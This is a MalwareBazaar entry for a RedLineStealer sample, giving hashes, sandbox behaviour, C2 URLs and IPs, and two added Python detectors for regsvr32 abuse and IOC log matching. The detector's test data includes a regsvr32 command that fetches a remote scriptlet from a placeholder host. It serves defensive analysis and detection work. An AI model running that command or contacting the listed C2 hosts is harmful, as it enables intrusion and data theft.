MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 4310e070b8ac0bb31d103b0b41c6e46a8b44b98dfcaabf8420aae23b73ac07c8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

RedLineStealer

Vendor detections: 11

SHA256 hash: 4310e070b8ac0bb31d103b0b41c6e46a8b44b98dfcaabf8420aae23b73ac07c8
SHA3-384 hash: a0488a153f74ca4e95d46c83fcbdb87c7c80138a51a942f5ece2ec47c31647033114fe9af5df1b6d0e11fafba86b270a
SHA1 hash: acb7e27c7c7666cdb532e7cb55ba7812b9451c40
MD5 hash: 41b6ce45f164abba6dba95fe2dd46761
humanhash: kansas-don-music-fifteen
File name: 41B6CE45F164ABBA6DBA95FE2DD46761.exe
Download: download sample
Signature: RedLineStealer
File size: 3'518'147 bytes
First seen: 2021-03-25 23:25:53 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash: fcf1390e9ce472c7270447fc5c61a0c1 (863 x DCRat, 118 x NanoCore, 94 x njrat)
ssdeep: 98304:Ubgfrr2W8Bhf2lK7mrC9poTGgrYrR55WRONw2kvpDD:U2rrehfx7mZGgra+OO75D
Threatray: 244 similar samples on MalwareBazaar
TLSH: 53F5235274C69972D5720B330775BA19247CBE202E145AEB73E06A9FEF325C0E634B23
Reporter: abuse_ch
Tags: exe RedLineStealer


abuse_ch
RedLineStealer C2:
http://miwnenalita.xyz/

Indicators Of Compromise (IOCs)


Below is a list of indicators of compromise (IOCs) associated with this malware sample.

IOC: http://miwnenalita.xyz/
ThreatFox reference: https://threatfox.abuse.ch/ioc/5384/

Intelligence


File Origin
# of uploads: 1
# of downloads: 189
Origin country: n/a
Vendor Threat Intelligence
Malware family: n/a
ID: 1
File name: 41B6CE45F164ABBA6DBA95FE2DD46761.exe
Verdict: Malicious activity
Analysis date: 2021-03-25 23:27:05 UTC
Tags: evasion trojan stealer

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample.
Result
Verdict: Malware
Maliciousness:

Behaviour
Creating a window
Searching for the window
Creating a file in the Windows subdirectories
Creating a process from a recently created file
Launching a process
Creating a file in the %temp% directory
Sending a UDP request
Creating a file
DNS request
Sending a custom TCP request
Launching cmd.exe command interpreter
Reading critical registry keys
Deleting a recently created file
Sending an HTTP GET request
Creating a process with a hidden window
Connecting to a non-recommended domain
Creating a file in the %AppData% directory
Running batch commands
Using the Windows Management Instrumentation requests
Changing a file
Sending an HTTP POST request
Unauthorized injection to a recently created process
Enabling autorun with the standard Software\Microsoft\Windows\CurrentVersion\Run registry branch
Launching a tool to kill processes
Connection attempt to an infection source
Sending an HTTP GET request to an infection source
Result
Verdict: MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Result
Threat name: Socelars
Detection: malicious
Classification: troj.spyw.evad
Score: 100 / 100
Signature
.NET source code contains potential unpacker
Antivirus detection for dropped file
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
PE file has nameless sections
Sigma detected: Regsvr32 Anomaly
Submitted sample is a known malware sample
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Socelars
Behaviour
Behavior Graph:
Behavior Graph ID: 376226
Sample: ajESKcIz8f.exe
Start date: 26/03/2021
Architecture: WINDOWS
Score: 100
Top-level signatures: Antivirus detection for URL or domain; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; 8 other signatures
Process tree (numbers in parentheses are the graph's node numbers; dropped files, network contacts and signatures are listed under the process they belong to; "..." in paths is as shown in the graph):
ajESKcIz8f.exe (10)
  dropped: C:\Users\user\Desktop\mmt.exe (PE32); C:\Users\user\Desktop\aszd.exe (PE32); C:\Users\user\Desktop\KRSetp.exe (PE32); 5 other files (1 malicious)
  started: mmt.exe (15); KRSetp.exe (20); pzysgf.exe (22); 5 other processes (26)
  mmt.exe (15)
    network: 5.101.110.225 DIGITALOCEAN-ASNUS Netherlands
    dropped: C:\Users\user\AppData\...\multitimer.exe (PE32); C:\Users\user\AppData\Local\...\setups.exe (PE32)
    signature: Detected unpacking (overwrites its own PE header)
    started: multitimer.exe (28); setups.exe (32)
    multitimer.exe (28)
      network: 104.248.226.77 DIGITALOCEAN-ASNUS United States
      signature: Multi AV Scanner detection for dropped file
    setups.exe (32)
      dropped: C:\Users\user\AppData\Local\...\setups.tmp (PE32)
      started: setups.tmp (47)
      setups.tmp (47)
        dropped: C:\Users\user\AppData\Local\...\psvince.dll (PE32); C:\Users\user\AppData\...\itdownload.dll (PE32); C:\Users\user\AppData\Local\Temp\...\idp.dll (PE32); 2 other files (none is malicious)
        started: iexplore.exe (56); iexplore.exe (58)
        iexplore.exe (56)
          started: iexplore.exe (65); iexplore.exe (68)
          iexplore.exe (65)
            network: 35.190.11.164 GOOGLEUS United States; 138.197.53.157 DIGITALOCEAN-ASNUS United States
          iexplore.exe (68)
            network: 139.45.195.8 RETN-ASEU Netherlands; 139.45.197.237 RETN-ASEU Netherlands; 12 other IPs or domains
  KRSetp.exe (20)
    network: 172.67.154.93 CLOUDFLARENETUS United States
    dropped: C:\ProgramData\7723805.84 (PE32); C:\ProgramData\3398320.37 (PE32); C:\ProgramData\1583231.17 (PE32)
    signature: Detected unpacking (changes PE section rights)
  pzysgf.exe (22)
    network: 208.95.112.1 TUT-ASUS United States; 2 other IPs or domains
    dropped: C:\Users\user\AppData\...\jfiag3g_gg.exe (PE32); C:\Users\user\AppData\Local\Temp\haleng.exe (PE32)
    started: jfiag3g_gg.exe (35); jfiag3g_gg.exe (37); jfiag3g_gg.exe (39)
    jfiag3g_gg.exe (35)
      signature: Tries to harvest and steal browser information (history, passwords, etc)
  5 other processes (26)
    network: 101.36.107.74 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK China; 88.99.66.31 HETZNER-ASDE Germany; 3 other IPs or domains
    dropped: C:\Users\user\Documents\...\md9_9sjm.exe (MS-DOS); MicrosoftMaORrfq6N...lX416ls9Updater.exe (PE32)
    signature: Drops PE files to the document folder of the user
    started: cmd.exe (41); WerFault.exe (43); explorer.exe (45, injected)
    cmd.exe (41)
      dropped: C:\Users\user\AppData\...\kesp0I0mYF.exe (PE32)
      signature: Submitted sample is a known malware sample
      started: kesp0I0mYF.exe (50); conhost.exe (52); taskkill.exe (54)
      kesp0I0mYF.exe (50)
        started: cmd.exe (60); cmd.exe (63)
        cmd.exe (60)
          dropped: C:\Users\user\AppData\Local\...\9ykwPuIL.0p (PE32)
          started: conhost.exe (70); cmd.exe (72); cmd.exe (74); regsvr32.exe (76)
        cmd.exe (63)
          started: conhost.exe (78)
    WerFault.exe (43)
      network: 104.42.151.234 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 192.168.2.1 unknown unknown
iexplore.exe (13)
  started: iexplore.exe (24)
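The graph above shows cmd.exe spawning regsvr32.exe right after a PE32 file with a non-DLL extension was dropped under AppData\Local, which is the behaviour the "Sigma detected: Regsvr32 Anomaly" hit in the signature list refers to. As an added example (written for this page, not the Sigma rule itself and not any sandbox vendor's code), the check below runs over Sysmon-style process-creation events and flags regsvr32 when it is pointed at a file in a user-writable directory, at a file without a COM-server extension, or at a remote scriptlet via /i:<URL>. The JSON events, their field names (Image, CommandLine, ParentImage), the dropped-file names and the 203.0.113.5 address are all constructed for the example.

```python
"""Flag anomalous regsvr32.exe invocations in process-creation events.

Added example for this page, in the spirit of the "Regsvr32 Anomaly" hit
reported above; it is not the Sigma rule and not vendor code. SAMPLE_EVENTS
are constructed JSON lines with Sysmon-style field names (an assumed log
format); the paths and the 203.0.113.5 address are made up.
"""
import json
import re

# Extensions a COM server registered through regsvr32 normally carries.
EXPECTED_EXT = (".dll", ".ocx", ".ax")

# Directories an ordinary user can write to. A COM server loaded from one of
# these (as the cmd.exe -> regsvr32.exe step in the graph does from AppData)
# deserves an alert on its own.
USER_WRITABLE = re.compile(
    r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads|Desktop)\\", re.I)

# Split a Windows command line while keeping quoted paths as one token.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# Constructed events: one benign registration from System32, one modelled on
# the graph's cmd.exe -> regsvr32.exe step, one benign vendor uninstall, one
# remote-scriptlet abuse, and one non-regsvr32 event that must be ignored.
SAMPLE_EVENTS = r"""
{"Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "regsvr32.exe /s \"C:\\Windows\\System32\\mshtml.dll\""}
{"Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "regsvr32.exe /s \"C:\\Users\\user\\AppData\\Local\\Temp\\dropped.0p\""}
{"Image": "C:\\Windows\\SysWOW64\\regsvr32.exe", "ParentImage": "C:\\Program Files\\Vendor\\setup.exe", "CommandLine": "regsvr32.exe /u /s \"C:\\Program Files\\Vendor\\comp.ocx\""}
{"Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "regsvr32.exe /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll"}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Users\\user\\AppData\\Roaming\\updater.exe", "CommandLine": "cmd.exe /c taskkill /f /im chrome.exe"}
""".strip().splitlines()


def regsvr32_findings(event):
    """Return the reasons this event is anomalous; empty for non-regsvr32
    events and for registrations that look ordinary."""
    if not event.get("Image", "").lower().endswith("\\regsvr32.exe"):
        return []
    tokens = [t.strip('"') for t in TOKEN_RE.findall(event.get("CommandLine", ""))]
    findings = []
    for arg in tokens[1:]:  # tokens[0] is the program name itself
        low = arg.lower()
        if low.startswith("/i:") and "://" in low:
            # /i:<url> with scrobj.dll fetches and runs a remote scriptlet
            findings.append(f"remote scriptlet argument: {arg}")
            continue
        if low.startswith(("/", "-")):
            continue  # ordinary switch such as /s, /u, /n
        if not low.endswith(EXPECTED_EXT):
            findings.append(f"non-DLL extension: {arg}")
        if USER_WRITABLE.search(arg):
            findings.append(f"user-writable location: {arg}")
    return findings


def scan_events(lines):
    """Return (ParentImage, CommandLine, findings) for each anomalous event."""
    hits = []
    for line in lines:
        event = json.loads(line)
        findings = regsvr32_findings(event)
        if findings:
            hits.append((event.get("ParentImage", ""),
                         event.get("CommandLine", ""), findings))
    return hits


if __name__ == "__main__":
    for parent, cmdline, findings in scan_events(SAMPLE_EVENTS):
        print(f"{parent} -> {cmdline}")
        for f in findings:
            print(f"    {f}")
```

Only the AppData event and the scriptlet event are reported; the System32 and Program Files registrations pass. In a real pipeline the parent process would be a further scoring input (cmd.exe or powershell.exe as parent is itself unusual for a software installer), but the file-location and extension checks alone already single out the step seen in the graph.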
Threat name: Win32.Infostealer.Passteal
Status: Malicious
First seen: 2021-03-23 00:17:30 UTC
AV detection: 18 of 29 (62.07%)
Threat level: 5/5
Result
Malware family:
Score: 10/10
Tags: family:glupteba family:metasploit family:redline family:smokeloader family:vidar backdoor discovery dropper evasion infostealer loader persistence spyware stealer themida trojan upx
Behaviour
Checks SCSI registry key(s)
Checks processor information in registry
Delays execution with timeout.exe
Enumerates system info in registry
Kills process with taskkill
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Modifies registry class
Modifies system certificate store
NTFS ADS
Runs ping.exe
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Program crash
Drops file in Program Files directory
Drops file in Windows directory
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks for any installed AV software in registry
Checks installed software on the system
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Maps connected drives based on registry
Checks computer location settings
Loads dropped DLL
Modifies file permissions
Reads local data of messenger clients
Reads user/profile data of web browsers
themida
Executes dropped EXE
UPX packed file
Checks for common network interception software
Glupteba
Glupteba Payload
MetaSploit
RedLine
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Malware Config
C2 Extraction:
http://xsss99.icu/upload/
http://bingooodsg.icu/upload/
http://junntd.xyz/upload/
http://ginessa11.xyz/upload/
http://overplayninsx.xyz/upload/
http://bananinze.com/upload/
http://daunimlas.com/upload/
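The reporter's C2 URL in the IOC section and the C2 extraction list above are the indicators a defender would sweep logs for. The following is an added example (written for this page, not MalwareBazaar or abuse.ch code) that matches those hosts against web-proxy log lines. Only the IOC URLs are taken from this entry; the log format ("timestamp client method url"), the client addresses and the log lines themselves are constructed. It matches on hostname rather than on the full URL, since the /upload/ path can change while the domain stays, and it accepts subdomains of an IOC host but not look-alike names that merely end in the same characters.

```python
"""Match the C2 indicators published on this page against proxy log lines.

Added example for this page; it is not MalwareBazaar/abuse.ch tooling.
IOC_URLS is copied from the entry (the reporter's C2 and the sandbox C2
extraction list). SAMPLE_LOG is constructed, and its "timestamp client
method url" layout is an assumed log format.
"""
import re
from urllib.parse import urlsplit

IOC_URLS = [
    "http://miwnenalita.xyz/",
    "http://xsss99.icu/upload/",
    "http://bingooodsg.icu/upload/",
    "http://junntd.xyz/upload/",
    "http://ginessa11.xyz/upload/",
    "http://overplayninsx.xyz/upload/",
    "http://bananinze.com/upload/",
    "http://daunimlas.com/upload/",
]

# Constructed log lines (RFC 1918 clients). The hits deliberately include a
# mixed-case host and a CONNECT target without a scheme to exercise the
# normalisation below; the notmiwnenalita.xyz line is a look-alike that
# must not match.
SAMPLE_LOG = """\
2021-03-25T23:30:01Z 10.0.0.15 GET http://www.example.com/index.html
2021-03-25T23:30:07Z 10.0.0.15 POST http://xsss99.icu/upload/
2021-03-25T23:30:09Z 10.0.0.22 GET http://MIWNENALITA.xyz/
2021-03-25T23:30:12Z 10.0.0.22 GET http://notmiwnenalita.xyz/
2021-03-25T23:30:15Z 10.0.0.31 CONNECT bananinze.com:443
""".splitlines()

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+)$")


def extract_host(url):
    """Lower-cased hostname of a URL, or of a bare host:port (CONNECT target)."""
    if "://" not in url:
        url = "//" + url  # make urlsplit read it as a netloc, not a scheme
    host = urlsplit(url).hostname  # urlsplit lower-cases the hostname
    return host.rstrip(".") if host else None


def ioc_hosts(urls):
    """Hostnames to match on; paths are ignored because C2 paths change."""
    return {extract_host(u) for u in urls}


def host_matches(host, iocs):
    """True for an exact IOC host or a subdomain of one (www.junntd.xyz),
    false for a name that merely ends in the same text (notmiwnenalita.xyz)."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in iocs)


def scan_log(lines, iocs):
    """Return (timestamp, client, matched host) for every line that hit an IOC."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        host = extract_host(m["url"])
        if host and host_matches(host, iocs):
            hits.append((m["ts"], m["client"], host))
    return hits


if __name__ == "__main__":
    for ts, client, host in scan_log(SAMPLE_LOG, ioc_hosts(IOC_URLS)):
        print(f"{ts} {client} contacted IOC host {host}")
```

Three of the five constructed lines are reported (xsss99.icu, miwnenalita.xyz and bananinze.com, the last one from a CONNECT line with no scheme). Matching by hostname also catches a later sample of the same family that reuses the domain with a different path, which a full-URL comparison would miss.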
Unpacked files
SHA256 hash:
0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498
MD5 hash:
cc0d6b6813f92dbf5be3ecacf44d662a
SHA1 hash:
b968c57a14ddada4128356f6e39fb66c6d864d3f
SHA256 hash:
55361941ab12c7edd987c706d25423d868f756fab1028d99eeffacdabf3da4ca
MD5 hash:
4de4b7bc0a92902422c4204fcfa58150
SHA1 hash:
587e0299ea32cc836281998941daa60f471e3480
SHA256 hash:
40ca14be87ccee1c66cce8ce07d7ed9b94a0f7b46d84f9147c4bbf6ddab75a67
MD5 hash:
7165e9d7456520d1f1644aa26da7c423
SHA1 hash:
177f9116229a021e24f80c4059999c4c52f9e830
SHA256 hash:
5f7ee5e605bfef4b1a1ac3f4d9c302ddb0765db6aa77a246904dc864de14c661
MD5 hash:
bf0868161e3811c4223ff471574f4846
SHA1 hash:
738106b0d5035a6ca83f407434216f021d96038f
SHA256 hash:
0bb9bb0248ff89fac4e513cc1891f8aabbcc076446790c68d849e5a6c007c1ca
MD5 hash:
2fbf0040b06b8719902326d9584c29c3
SHA1 hash:
f2983c7b2d3d91722fb88198ac2441c5e098c2cf
SHA256 hash:
2abb1e6941e76ea8dd8cc99046ccf0e8d4b6995e3d519c789dedcc17993ae1e2
MD5 hash:
08900378246f12c89e8fd35d9dda6982
SHA1 hash:
8c2b4eb42021f4837ca1fc06ad8e7cfe06249e3e
SHA256 hash:
4d9aee7b3298c5d37636fc5329665d8f2a01796a13f748b2f8217d06a143b4c5
MD5 hash:
0682dd74085fb84ca58b216df14de9fd
SHA1 hash:
8bd40bb9e454afc0b751327594d3f3b3bcd3ec5d
SHA256 hash:
9a58e6a714465c5cc5b9f96ec1f740df384ea075bd9938474d509495c6a8afc5
MD5 hash:
bc2b6c86643a8795ab87208ce37cfd1d
SHA1 hash:
7a6c8c312c0e453983a9ffdc40373c5937ed5d21
SHA256 hash:
ec11370852f61298a6510d62848532e19e177a8cf8845bdbd430771357d766a1
MD5 hash:
f58986495250e3f318fc8f65ee2f5104
SHA1 hash:
d6ac631d9fc78b85d50dfaf80644fb60b64c8488
SHA256 hash:
bd6cc0c088a8d3c1fe2573e428096e0d779491bf5c9e5c28550ef9b1be17f71b
MD5 hash:
3be1509ae3817af2d6fe004880f3da35
SHA1 hash:
2c5ee359532afa37067caaf161c8f693ef38d522
SHA256 hash:
9a23959ae58f8d2847d050d4952a22c56bb6c6717d1c06a0b0e8ce77272b4363
MD5 hash:
f633c701273c113ed65c0454c34ce299
SHA1 hash:
fa3ea378e0257e25603a91ca7ef8e925464e18e8
SHA256 hash:
3559ea7af670e3e162c4f6468005559f0ff50a6cdffa3d1d8fbf5e62842fd8ff
MD5 hash:
c69a79a4b0ae4e88616606de9cc2e82c
SHA1 hash:
9cd741b33150c9f4021eea786076cd2fb0284b79
SHA256 hash:
4880a6d78983787532ea1acd140ac405a7e63cc31bcceb1c15fbd4bf03cc1fd9
MD5 hash:
b7a52eda09378a407090f2fb8d5e2692
SHA1 hash:
ee481b225344d035a804ff849cffb8013d3eb702
SHA256 hash:
74e63fb94f0155eae741c062fa47290408fa01d884f51de1e80dc253606cdb3a
MD5 hash:
3c4edc425a24cc99a1686a71fee03b49
SHA1 hash:
cf5589ed119d5529d7c079a9b4905f9b02d0d357
Detections:
win_socelars_auto
SHA256 hash:
bd35bbdae3c007c0623d5cba08bc214aa0f65da9b6639cf1e1f52cbb6d56cc98
MD5 hash:
303304d8d1c43c4d83310cd9fa57d8b6
SHA1 hash:
9a34d62da325f3d7e0d2e6dafe62c350c31aaddd
SHA256 hash:
13e3814f8c88b0864b4be410d7b85bedceda1d32ae30acad913c14f14243f844
MD5 hash:
727706d0daaee6ec778cbaffbd87faf5
SHA1 hash:
0e9e5d684a4d0cb9d8cba7485efcad054807172a
SHA256 hash:
4310e070b8ac0bb31d103b0b41c6e46a8b44b98dfcaabf8420aae23b73ac07c8
MD5 hash:
41b6ce45f164abba6dba95fe2dd46761
SHA1 hash:
acb7e27c7c7666cdb532e7cb55ba7812b9451c40
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: INDICATOR_EXE_Packed_MPress
Author: ditekSHen
Description: Detects executables built or packed with MPress PE compressor

Rule name: suspicious_packer_section
Author: @j0sm1
Description: The packer/protector section names/keywords
Reference: http://www.hexacorn.com/blog/2012/10/14/random-stats-from-1-2m-samples-pe-section-names/

Rule name: susp_winsvc_upx
Author: SBousseaden
Description: broad hunt for any PE exporting ServiceMain API and upx packed

Rule name: win_servhelper_auto
Author: Felix Bilstein - yara-signator at cocacoding dot com
Description: autogenerated rule brought to you by yara-signator

Rule name: win_smokeloader_a2
Author: pnx

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments